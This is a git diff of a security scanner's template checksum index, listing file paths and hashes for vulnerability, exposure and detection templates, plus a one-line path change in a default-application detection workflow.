http/default-logins/openmediavault/openmediavault-default-login.yaml:efb418987e7a7b80b6fc9ea78f883b4dcaa90efe
http/default-logins/oracle/businessintelligence-default-login.yaml:29309871b052bb3f05de613e838dadb92dd47f79
http/default-logins/oracle/peoplesoft-default-login.yaml:6ee288c848a0c5a046e206b7f245a50f886e72d6
http/default-logins/oracle/peoplesoft-default-login.yaml:21071ffc4b0449f88570d4d604038756ccd18209
http/default-logins/others/aruba-instant-default-login.yaml:398f77a4e4e01153465c51bdfeb3cf53f670a85b
http/default-logins/others/ciphertrust-default-login.yaml:9d29315f7fd68f1e4f55dd046bf7c716658ef13e
http/default-logins/others/cnzxsoft-default-login.yaml:71898b0928c2f380612addb0350fb686dd84e025
@ -3292,7 +3297,7 @@ http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870
http/exposed-panels/addonfinance-portal.yaml:38506f2dd6a3a69108a50fe67a2686af99398590
http/exposed-panels/adhoc-transfer-panel.yaml:dcce7565c43f4ea78e2a3ad9fc8216f301f05c94
http/exposed-panels/adiscon-loganalyzer.yaml:fc2432f93a3fd7724c3f0d2814d41c065e0b8b21
http/exposed-panels/adminer-panel-detect.yaml:e1426681f4d6c9e2502bc10a2327e73b6fa9113e
http/exposed-panels/adminer-panel-detect.yaml:2c1c41366071aef22dcd3f0fb77608e8ba4d18d8
http/exposed-panels/adminer-panel.yaml:b266fbab664e4ee130429e725409cf78000739e0
http/exposed-panels/adminset-panel.yaml:2be3fbb1ec0fe028405fdb0353163d1352a14d65
http/exposed-panels/adobe/adobe-component-login.yaml:ca846d96566ad14a055b85c15bd2b61e3a786d8d
@ -4111,6 +4116,7 @@ http/exposed-panels/skycaiji-admin-panel.yaml:361c2ff751869e4b694246e113ceaf3e0c
http/exposed-panels/slocum-login.yaml:882558fc76eedef7ba2f13a9011a298046d85fe5
http/exposed-panels/smartping-dashboard.yaml:95eec001a41f2fe0c66ebfc58e0560cd9755e5cd
http/exposed-panels/snapcomms-panel.yaml:2415e99a631ec5250f3f9be63e99f91d15d6f494
http/exposed-panels/softether-vpn-panel.yaml:9c37a5f904da87f0cc892b4a675a6b50432e2708
http/exposed-panels/solarview-compact-panel.yaml:be95efca10dca1f6b755b1d7e6f91e4f77e0594f
http/exposed-panels/solarwinds-arm-panel.yaml:2aaf482c52b633dfe17bad946cfed56da0282d0f
http/exposed-panels/solarwinds-orion.yaml:d04c286187f0f4b310d767196124eead9bab0a89
@ -4340,7 +4346,7 @@ http/exposures/apis/wadl-api.yaml:7a728eb7a4cb779218d582661a7fb2978abedc03
http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df
http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907
http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984
http/exposures/backups/php-backup-files.yaml:6af27377a944a299aee9bf4c4dbd8b60b99b8224
http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391
http/exposures/backups/settings-php-files.yaml:4deb7ac78c1f7df72c6efad11c7ce77373c3ba7b
http/exposures/backups/sql-dump.yaml:e989e8b4ad56b0ed996c7dc9cec7eab2210c223c
http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e
@ -4524,7 +4530,6 @@ http/exposures/files/desktop-ini-exposure.yaml:e1f2848de5e29a1d1f0069c15a5451d38
http/exposures/files/django-secret-key.yaml:9a9152c6627c7d1bb85923caedf61303f26e78b9
http/exposures/files/docker-cloud.yaml:1cd831e6d009b49e120b14206b7a19b825fd5272
http/exposures/files/domcfg-page.yaml:28b2f74eed60f6bf047db658ffcf8ccbacfb90a4
http/exposures/files/drupal-install.yaml:becf211637e4dbbe6b1f0fa018d53f4ea23de648
http/exposures/files/ds-store-file.yaml:679fb351af4567e417c0697f8d3298ddc14767b4
http/exposures/files/dwsync-exposure.yaml:811dc04f9ef973b6d48e8b007590508b61230b4b
http/exposures/files/environment-rb.yaml:cfd936dc5174ec7eee345830477ad8ee013d5eb4
@ -4533,6 +4538,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5
http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d
http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910
http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1
http/exposures/files/generic-db.yaml:36dc57f7db3eac512d56d7d54f0bb767cbb7fe88
http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d
http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf
http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e
@ -4822,19 +4828,19 @@ http/exposures/tokens/zendesk/zendesk-key.yaml:002e66de48b921b1485a90c9ee0b8202d
http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a8b850b2efaae638efc02b5d207fe6bc855610e9
http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad22f57bad735
http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb
http/fuzzing/cache-poisoning-fuzz.yaml:0dea0da9f14667463434dd2938455cb041e9de7a
http/fuzzing/header-command-injection.yaml:f35e69a5b540b432355364ce314be23d0dfe72de
http/fuzzing/iis-shortname.yaml:878ffbd680260e7de82515ae139572b9d076ba40
http/fuzzing/linux-lfi-fuzzing.yaml:6d09bdb021b1d2f04197a1afcb5566f94c345578
http/fuzzing/mdb-database-file.yaml:44368401b80d528a53411419188d8654cc01092a
http/fuzzing/prestashop-module-fuzz.yaml:1770351eb8024ad210d1773b851f15a92f523bf6
http/fuzzing/ssrf-via-proxy.yaml:67a0e37236d363d42d148494ee00f3fb55372ce3
http/fuzzing/valid-gmail-check.yaml:5322234e7caccea4fe57c3ec8ea7e5b6b91317e6
http/fuzzing/waf-fuzz.yaml:6b9237448f006d60291634510ac4d910fb73ca0c
http/fuzzing/wordpress-plugins-detect.yaml:3bb133a2a5af6333133a4d1afc69b7253325e071
http/fuzzing/wordpress-themes-detect.yaml:81452a0c2201364547a722b3268c3cc9be19fbad
http/fuzzing/wordpress-weak-credentials.yaml:3688f4121a6862a3ec2177a0c28c6f0aaea1cfe8
http/fuzzing/xff-403-bypass.yaml:3988407398c98a0f521e0251aafe2738470ed895
http/fuzzing/cache-poisoning-fuzz.yaml:f98fed523a1e8b80a6c5c12183c6f072bb81cf5e
http/fuzzing/header-command-injection.yaml:bf0af66d12ef68c553a7a0d496f469788f3d03c3
http/fuzzing/iis-shortname.yaml:aafbc44fc50e604004bf52f14b83354e24163827
http/fuzzing/linux-lfi-fuzzing.yaml:a92bbc9f1c966c3f909279c49e2dee0a2bfffac9
http/fuzzing/mdb-database-file.yaml:f6bb4e9e482516e6a861cc1efc68063e61778d13
http/fuzzing/prestashop-module-fuzz.yaml:8e7f0e0bd609549e38f8eadc603360e8a56f2a02
http/fuzzing/ssrf-via-proxy.yaml:8b57f45fe9d33268b5ae1dcd1a73301a47dfee62
http/fuzzing/valid-gmail-check.yaml:a91c4df030cbeb5d163df9a3150cb146eb495412
http/fuzzing/waf-fuzz.yaml:0bf3b44516d1eab46bbc11fb2eada0293c76a2ad
http/fuzzing/wordpress-plugins-detect.yaml:4bd980e6a9b9246896b0961dbff25a199038bcf0
http/fuzzing/wordpress-themes-detect.yaml:86b90c67fd9c7fb48a6eff67fdb63a185f402ea8
http/fuzzing/wordpress-weak-credentials.yaml:13dbc34b62167f75f802b83a3e71d89387ba54a6
http/fuzzing/xff-403-bypass.yaml:23f78013ddcc53b07fbc3a114f0eaa45f90001d5
http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbbc5
http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25
http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa
@ -4895,7 +4901,7 @@ http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d
http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0
http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387
http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5
http/miscellaneous/defacement-detect.yaml:b1ec2272ff1ecfdfa21cf8bec5620e26d325817e
http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e
http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b
http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326
http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281
@ -4912,7 +4918,7 @@ http/miscellaneous/maxforwards-headers-detect.yaml:9d69555c1fc58f644b5ccf2644e0a
http/miscellaneous/microsoft-azure-error.yaml:bfa3c53d4023d524a09ba3565bd3bf63204ac58a
http/miscellaneous/moodle-changelog.yaml:9dbf59caabecc08967456fa3986046e33f4dbf43
http/miscellaneous/netflix-conductor-version.yaml:31ad2c649ff4aa0703a5c7cd4e36d2245a8993e0
http/miscellaneous/ntlm-directories.yaml:5f40ea6a1dda6cd8654e61902adb60b877945de5
http/miscellaneous/ntlm-directories.yaml:8d52b0df9375267f6ba7840037a48a96cb971dda
http/miscellaneous/old-copyright.yaml:de816764aefeaf59f75201740f4f82fb31071194
http/miscellaneous/options-method.yaml:2e0edc5993baa53c6fb7e8307c80ea26254bc3e4
http/miscellaneous/rdap-whois.yaml:c25cfe8b61f82c032de77398cf1aed94f56f0004
@ -4958,7 +4964,7 @@ http/misconfiguration/aem/aem-secrets.yaml:346f23f7070fdf59c2c76fddd12a5eb4f31c7
http/misconfiguration/aem/aem-security-users.yaml:ff974be49aaee03897db4a6d40117b9e5d02598d
http/misconfiguration/aem/aem-setpreferences-xss.yaml:dd08fc188a7ad278c8ee3082b66d9d2282d1c9e8
http/misconfiguration/aem/aem-sling-userinfo.yaml:f38274749b0668275a6b8cdddc2707bbde9eb1a0
http/misconfiguration/aem/aem-userinfo-servlet.yaml:ad12a83b873c3e1bd09b0b675368f78013a26261
http/misconfiguration/aem/aem-userinfo-servlet.yaml:4e42c3fd5d4ae21b1e0a686a35c69394d1d9d32b
http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:cc07ee10590df2dd7de1d03c73167bbd4d81b95b
http/misconfiguration/aem/aem-xss-childlist-selector.yaml:a9ecdb229a17db9192821a583549813a1bb1fc3c
http/misconfiguration/airflow/airflow-debug.yaml:c18746cecd6f440d9367f6ebe1ce70ff34e508af
@ -5073,7 +5079,7 @@ http/misconfiguration/gitlab/gitlab-public-repos.yaml:1a2b426983d0ca449461a9ece3
http/misconfiguration/gitlab/gitlab-public-signup.yaml:f604c8044baffdf63ed2215ccec5b5721202144b
http/misconfiguration/gitlab/gitlab-public-snippets.yaml:64aa47f34d185b8bbbc04b242eb0a76886d641ec
http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml:d9959b940359896de41142fe765303a3627c7ae5
http/misconfiguration/gitlab/gitlab-user-enum.yaml:f3372fa8a631a0249e5a108ac8e2d610a5a6ec71
http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a501e1c580757
http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e
http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d
http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc
@ -5129,6 +5135,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3
http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7
http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f
http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057
http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36
http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9
http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251
http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99
@ -5320,9 +5327,9 @@ http/misconfiguration/proxy/metadata-hetzner.yaml:99b85a4199e83eff23ec416b6b6fff
http/misconfiguration/proxy/metadata-openstack.yaml:6e1984d2e3aa87e07e6b7db80dbd7c9d10c9d417
http/misconfiguration/proxy/metadata-oracle.yaml:93d94888c382735e755c96a1908859778f1308ef
http/misconfiguration/proxy/open-proxy-external.yaml:e05b7e6f0744ee250192e9167a89b4d6c7dfdee1
http/misconfiguration/proxy/open-proxy-internal.yaml:198c9a37e2ddb668d66fb1598d5f73784dca1a24
http/misconfiguration/proxy/open-proxy-localhost.yaml:2a876eb905cbd8591af8d8c7cb8494fd2db314e9
http/misconfiguration/proxy/open-proxy-portscan.yaml:10aaa6234f8c68a346e226e5bc615de2134ac10e
http/misconfiguration/proxy/open-proxy-internal.yaml:231fecdb37f031eb304aba2267a8ba6ad16641ec
http/misconfiguration/proxy/open-proxy-localhost.yaml:583e013ed1b8deaaa42735861dc5201a8285afc6
http/misconfiguration/proxy/open-proxy-portscan.yaml:790b7ea770648cb312cb5c103951c3c7254cb0c2
http/misconfiguration/puppetdb-dashboard.yaml:5b1f354f5ab9343e46a20bd7c76a8ee044cf71b4
http/misconfiguration/put-method-enabled.yaml:4cbb1715aeb73cf6e638b02c9951ff02c7a67756
http/misconfiguration/python-metrics.yaml:0b1d1102e4329ebf75ae5cc259898f1cb1cd9670
@ -6407,6 +6414,7 @@ http/technologies/dell/dell-idrac8-detect.yaml:1dff3a1be021d38ea8846d6151c920edb
http/technologies/dell/dell-idrac9-detect.yaml:44da5eecdb4a220ccde1aecdd8c801986a988367
http/technologies/detect-sentry.yaml:f4f51185253e23a6e3db1f4bbcb1a37bebf4da1a
http/technologies/devexpress-detect.yaml:6a5327a8a84357f2e365da16936697859e0f6020
http/technologies/directus-detect.yaml:6284abebab6cc1c447f02dd03c711303a4cdd22f
http/technologies/dreambox-detect.yaml:35362632d9ed50a1e5b4513bfc5a09543c63e431
http/technologies/drupal-detect.yaml:5c269fdf58cf085a8ac062b1f23cd8b3a0ef7f99
http/technologies/dwr-index-detect.yaml:11ebf6bffb83d15af8cbca407b38fee3d67b72ab
@ -6426,7 +6434,7 @@ http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1
http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac
http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a
http/technologies/favicon-detect.yaml:10cb70dd76719f7850249d0b9184054205fd47f5
http/technologies/fingerprinthub-web-fingerprints.yaml:27e666a6c70080629b106d8a7549a69b04e80292
http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd
http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2
http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9
http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9
@ -6447,7 +6455,7 @@ http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80c
http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29
http/technologies/graphql-detect.yaml:a0566e15058b3aeb2d4dae77cc99d23355938dac
http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1
http/technologies/graylog/graylog-api-exposure.yaml:5a677a5db5ed943770e6f6a1c2cf4e6e8f947b36
http/technologies/graylog/graylog-api-exposure.yaml:d101cae7fd923dd7f233bf27e3a9b3628b8c3d5e
http/technologies/graylog-api-browser.yaml:5aaa8bff99b57cf700d0923b48778048789f2389
http/technologies/gunicorn-detect.yaml:4e32fda7d9483af8c21fd3ea7fa6669266e23d0d
http/technologies/hanwang-detect.yaml:4866144f96b1fbc18567e10ad7732b8a1a8dfc5f
@ -6532,7 +6540,7 @@ http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:341d9ec2d4e676c7d0
http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d
http/technologies/microsoft/default-microsoft-azure-page.yaml:edf6bd39671cbd1eeda217a1956965a66e368d06
http/technologies/microsoft/default-windows-server-page.yaml:eddc0c09081a8fdfdd579671ba67816b49e8bb81
http/technologies/microsoft/microsoft-iis-version.yaml:879e7e413c5a14c9f8d60c781d1a2d6e14082a0c
http/technologies/microsoft/microsoft-iis-version.yaml:dcf1fea08a8e195fb4fb800bddc0355619141c06
http/technologies/microsoft/microsoft-sharepoint-detect.yaml:dabe925d2623a1e643cc36887c63daa6079a51d7
http/technologies/microsoft/ms-exchange-server.yaml:ac56edde8f4b9be40add08dffaa028504eeedd69
http/technologies/microsoft/sql-server-reporting.yaml:f09e2468fe44fbccafc12b034f080bee81f7c7e8
@ -6677,6 +6685,7 @@ http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120
http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f
http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d
http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542
http/technologies/wing-ftp-service-detect.yaml:0df5cbc14e688f4a21fb88751550ed2dc27e5497
http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d
http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8
http/technologies/wordpress/plugins/ad-inserter.yaml:e1496850b2a8ebec1b470544d5bb38e52760d900
@ -7609,6 +7618,7 @@ http/vulnerabilities/other/unauth-hoteldruid-panel.yaml:279bc487a6928ac8687f5e2e
http/vulnerabilities/other/unauth-spark-api.yaml:d3205ad468e29b3fd6d59637db539399b1c93c64
http/vulnerabilities/other/unifi-network-log4j-rce.yaml:ab0f3c5c653a7406ee48d9a1ee0b1b810801c6db
http/vulnerabilities/other/universal-media-xss.yaml:18afec046906e2afc3c2a1b9eee94e6fed1008e9
http/vulnerabilities/other/ups-network-lfi.yaml:973370147cfb7fb529fd2c978f4900ccef9215af
http/vulnerabilities/other/vanguard-post-xss.yaml:ebea3529277da89f92f263b4c2e01b1440ead349
http/vulnerabilities/other/viewlinc-crlf-injection.yaml:dc9df9a7e0f610a07fe7611c166ae358706450ce
http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml:e69e54fb6312bebd4dd9e111db93045fea6eedef
@ -7702,7 +7712,7 @@ http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d
http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:26127f055c9c3ffa79366002ca95ea0c80a9c1dc
http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c
http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc
http/vulnerabilities/tongda/tongda-auth-bypass.yaml:4fd1922eebdd4690602da2a46f2db2aafdfcef26
http/vulnerabilities/tongda/tongda-auth-bypass.yaml:99626945f8fb206ae2046e9f22cebadaef9eef0e
http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml:d1d9be064a074860683581a4e84f8e85a3abfc27
http/vulnerabilities/tongda/tongda-getdata-rce.yaml:b4452e0abc9faa89378a2d6b14c6ef99eddbb56d
http/vulnerabilities/tongda/tongda-getway-rfi.yaml:02cae92f443ca026546155a79f51aab073d2a0dd
@ -7944,7 +7954,7 @@ http/vulnerabilities/wordpress/wp-vault-lfi.yaml:12ee639ae8dd7fb66560ac713aab3a4
http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:d36b1dafca4c01fbc15d17c4e884144f36974304
http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:9cd53ef3a743e970ff37c36b2c9640781d578878
http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:0e1c6d447132c374e620d553de2cd8a8468f917e
http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:f19c8ecb61fc6cb7a1d1c1f94898be756d976779
http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:a9c485aef2957f73eec1ea22a2b851f98284f9c9
http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:f72f913987c22ad251d6b4b09e10fe57f20f0727
http/vulnerabilities/wordpress/wp-xmlrpc.yaml:b55a9ba158dc74c9797ce3cddb6464bf48106074
http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml:ec8dd93cf0c3f663465b7191136013def01f5d0f
@ -7985,13 +7995,13 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac
http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0
http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b
javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0
javascript/cves/2023/CVE-2023-34039.yaml:99873aefa26ca441bdea56e83f1433ddc11054c4
javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8
javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb
javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625
javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3
javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161
javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad
javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f
javascript/default-logins/ssh-default-logins.yaml:18115e88843b935c771139ba788aa321a8a8e75b
javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62
javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94
javascript/detection/oracle-tns-listener.yaml:3d274f668de183b62c79c04782bf0740150b4423
javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04
@ -8136,10 +8146,10 @@ network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c
network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b
network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109
network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a
network/misconfig/mysql-native-password.yaml:214396d10e5a824362e0184c365b862581629394
network/misconfig/mysql-native-password.yaml:610a602de84dc589c5f48b133d27f6b77f3cc422
network/misconfig/printers-info-leak.yaml:3eaf0fc4e07c21308b3bd7f387f2f6765979ad15
network/misconfig/sap-router-info-leak.yaml:a7ebbd8a06f5add2a3ded6259da9b3b3b5e0f005
network/misconfig/tidb-native-password.yaml:140577255bfbe46ab1c88e594405a34b889a56f8
network/misconfig/tidb-native-password.yaml:e59b6ae7f999845de1660e740e99c300175f2845
network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd
network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740
network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37
@ -8170,7 +8180,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
templates-checksum.txt:f6eaac90af8e77b23be2e3482cf5afbd3b015566
templates-checksum.txt:608bfc81bcb7af107a327b22977799f2016e33a5
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4
@ -8209,7 +8219,7 @@ workflows/concrete-workflow.yaml:9ce74c7f22e588fe67965f30608d5b4c2b63b97b
workflows/confluence-workflow.yaml:68fd7ea4f21d30bfb2898f6b714728dcf08c5fbc
workflows/dahua-workflow.yaml:2e6e287ca5c83229a03cc790fca31962ca0a8a1a
workflows/dedecms-workflow.yaml:c96c00339a55a8ede0578bdb8ae625b4b6d7e32d
workflows/default-application-workflow.yaml:07fe2d7545f5768661550d63536b0fe61f4433bb
workflows/default-application-workflow.yaml:df25752fc3cc808eaba4d365f2924744130db71a
workflows/dell-idrac-workflow.yaml:40a2853262007c7904c0ca6ceeff8116d2694139
workflows/dolibarr-workflow.yaml:36c2eaa9e3aabe24b61b95c7e451dae5f26939b5
workflows/dotnetnuke-workflow.yaml:8e2578065d576a59c30a807fab1913ae5726a779

View File

@ -4,6 +4,7 @@ info:
name: Default Web Application Detection
author: andydoering
description: Detects default installations of web applications
workflows:
- template: http/technologies/apache/default-apache-test-all.yaml
@ -23,7 +24,7 @@ workflows:
- template: http/technologies/default-django-page.yaml
- template: http/exposures/files/drupal-install.yaml
- template: http/misconfiguration/installer/drupal-install.yaml
- template: http/technologies/oracle/default-oracle-application-page.yaml